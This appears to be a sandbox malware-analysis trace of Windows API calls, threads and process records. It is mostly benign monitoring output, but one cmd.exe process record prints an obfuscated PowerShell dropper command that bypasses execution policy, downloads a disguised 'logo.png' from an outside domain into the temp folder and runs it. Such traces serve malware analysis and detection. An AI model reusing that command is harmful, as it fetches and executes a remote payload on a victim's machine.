	[0228.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.943] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.944] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.947] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.701] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.704] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.712] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.714] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.715] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.716] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.719] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0229.720] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.689] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0233.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dbe30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0245.370] VirtualQuery (in: lpAddress=0x1db560, lpBuffer=0x1dc420, dwLength=0x30 | out: lpBuffer=0x1dc420*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0245.703] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0245.703] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.703] CoTaskMemFree (pv=0x3c3ba0) 
	[0245.711] VirtualQuery (in: lpAddress=0x1db560, lpBuffer=0x1dc420, dwLength=0x30 | out: lpBuffer=0x1dc420*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0245.726] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0245.726] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.726] CoTaskMemFree (pv=0x3c3ba0) 
	[0245.730] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0245.730] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.730] CoTaskMemFree (pv=0x3c3ba0) 
	[0245.732] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0245.732] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0245.732] CoTaskMemFree (pv=0x3c3ba0) 
	[0246.075] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0246.075] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.075] CoTaskMemFree (pv=0x3c3ba0) 
	[0246.081] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0246.081] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.082] CoTaskMemFree (pv=0x3c3ba0) 
	[0246.084] CoTaskMemAlloc (cb=0x104) returned 0x3c3ba0
	[0246.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0246.084] CoTaskMemFree (pv=0x3c3ba0) 
	[0246.091] VirtualQuery (in: lpAddress=0x1db560, lpBuffer=0x1dc420, dwLength=0x30 | out: lpBuffer=0x1dc420*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0246.092] VirtualQuery (in: lpAddress=0x1db560, lpBuffer=0x1dc420, dwLength=0x30 | out: lpBuffer=0x1dc420*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.356] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.356] CoTaskMemFree (pv=0x3c3ba0) 
	[0252.056] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3c3fe0
	[0252.058] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x3c40f0
	[0258.767] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0258.767] CoTaskMemFree (pv=0x3c4200) 
	[0259.262] CoTaskMemAlloc (cb=0x104) returned 0x3c4200
	[0259.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c4200, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.262] CoTaskMemFree (pv=0x3c4200) 
	[0259.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.266] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1dc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 56
	os_tid = 0x8e4


Thread:
	id = 59
	os_tid = 0x8d0


Thread:
	id = 64
	os_tid = 0x904


Thread:
	id = 104
	os_tid = 0x948


Thread:
	id = 107
	os_tid = 0x78c

	[0061.552] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.931] LocalFree (hMem=0x3d3af0) returned 0x0
	[0149.931] CloseHandle (hObject=0x1d4) returned 1
	[0149.931] CloseHandle (hObject=0x13) returned 1
	[0149.932] CloseHandle (hObject=0xf) returned 1
	[0149.932] RegCloseKey (hKey=0x310) returned 0x0
	[0149.932] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.932] RegCloseKey (hKey=0x308) returned 0x0
	[0149.933] LocalFree (hMem=0x3d38c0) returned 0x0
	[0149.933] RegCloseKey (hKey=0x328) returned 0x0
	[0174.714] RegCloseKey (hKey=0x324) returned 0x0
	[0212.899] RegCloseKey (hKey=0x37c) returned 0x0
	[0212.899] RegCloseKey (hKey=0x378) returned 0x0
	[0212.899] RegCloseKey (hKey=0x374) returned 0x0
	[0212.900] RegCloseKey (hKey=0x370) returned 0x0
	[0212.900] RegCloseKey (hKey=0x36c) returned 0x0
	[0212.900] RegCloseKey (hKey=0x368) returned 0x0
	[0212.900] RegCloseKey (hKey=0x344) returned 0x0
	[0212.900] RegCloseKey (hKey=0x394) returned 0x0
	[0212.901] RegCloseKey (hKey=0x360) returned 0x0
	[0212.901] RegCloseKey (hKey=0x35c) returned 0x0
	[0212.901] RegCloseKey (hKey=0x358) returned 0x0
	[0212.901] RegCloseKey (hKey=0x354) returned 0x0
	[0212.902] RegCloseKey (hKey=0x350) returned 0x0
	[0212.902] RegCloseKey (hKey=0x34c) returned 0x0
	[0212.902] RegCloseKey (hKey=0x348) returned 0x0
	[0212.902] RegCloseKey (hKey=0x390) returned 0x0
	[0212.902] RegCloseKey (hKey=0x38c) returned 0x0
	[0212.903] RegCloseKey (hKey=0x338) returned 0x0
	[0212.903] RegCloseKey (hKey=0x334) returned 0x0
	[0212.903] RegCloseKey (hKey=0x330) returned 0x0
	[0212.903] RegCloseKey (hKey=0x1d4) returned 0x0
	[0212.903] RegCloseKey (hKey=0x310) returned 0x0
	[0212.904] RegCloseKey (hKey=0x30c) returned 0x0
	[0212.904] RegCloseKey (hKey=0x308) returned 0x0
	[0212.904] RegCloseKey (hKey=0x32c) returned 0x0
	[0212.904] RegCloseKey (hKey=0x324) returned 0x0
	[0212.904] RegCloseKey (hKey=0x388) returned 0x0
	[0212.905] RegCloseKey (hKey=0x384) returned 0x0
	[0212.905] RegCloseKey (hKey=0x364) returned 0x0
	[0212.905] RegCloseKey (hKey=0x398) returned 0x0

Thread:
	id = 202
	os_tid = 0x478


Process:
	id = "9"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7953c000"
	os_pid = "0x33c"
	os_integrity_level = "0x4000"
	os_privileges = "0x60b16080"
	monitor_reason = "rpc_server"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000c0b1" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 69
	os_tid = 0x9f8


Thread:
	id = 70
	os_tid = 0x3d4


Thread:
	id = 71
	os_tid = 0x378


Thread:
	id = 72
	os_tid = 0x7a8


Thread:
	id = 73
	os_tid = 0x314


Thread:
	id = 74
	os_tid = 0x7b0


Thread:
	id = 75
	os_tid = 0x7a4


Thread:
	id = 76
	os_tid = 0x79c


Thread:
	id = 77
	os_tid = 0x6d0


Thread:
	id = 78
	os_tid = 0x6cc


Thread:
	id = 79
	os_tid = 0x1c4


Thread:
	id = 80
	os_tid = 0x120


Thread:
	id = 81
	os_tid = 0x3f0


Thread:
	id = 82
	os_tid = 0x3ec


Thread:
	id = 83
	os_tid = 0x3e4


Thread:
	id = 84
	os_tid = 0x3e0


Thread:
	id = 85
	os_tid = 0x3d0


Thread:
	id = 86
	os_tid = 0x3cc


Thread:
	id = 87
	os_tid = 0x398


Thread:
	id = 88
	os_tid = 0x394


Thread:
	id = 89
	os_tid = 0x384


Thread:
	id = 90
	os_tid = 0x380


Thread:
	id = 91
	os_tid = 0x368


Thread:
	id = 92
	os_tid = 0x350


Thread:
	id = 93
	os_tid = 0x340


Process:
	id = "10"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x1bd06000"
	os_pid = "0x838"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "6"
	os_parent_pid = "0x41c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu"
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 96
	os_tid = 0x840

	[0055.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f980 | out: lpSystemTimeAsFileTime=0x14f980*(dwLowDateTime=0x99630170, dwHighDateTime=0x1d543d1)) 
	[0055.128] GetCurrentProcessId () returned 0x838
	[0055.128] GetCurrentThreadId () returned 0x840
	[0055.128] GetTickCount () returned 0x1ea6d
	[0055.128] QueryPerformanceCounter (in: lpPerformanceCount=0x14f988 | out: lpPerformanceCount=0x14f988*=17955408596) returned 1
	[0055.129] GetModuleHandleW (lpModuleName=0x0) returned 0x4ac50000
